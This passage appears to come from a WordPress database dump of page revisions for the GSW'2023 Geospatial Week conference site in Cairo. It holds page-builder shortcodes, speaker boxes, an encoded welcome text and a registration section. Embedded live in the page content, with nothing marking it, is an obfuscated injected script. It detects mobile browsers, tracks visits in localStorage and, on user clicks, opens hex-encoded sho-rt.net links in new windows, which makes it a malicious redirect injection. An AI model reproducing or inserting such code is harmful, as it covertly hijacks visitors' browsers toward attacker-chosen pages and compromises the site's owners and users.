u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-07 13:27:56','2022-10-07 13:27:56','',2167,'https://gsw2023.com/?p=2398',0,'revision','',0),
(2399,1,'2022-10-07 13:48:58','2022-10-07 13:48:58','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 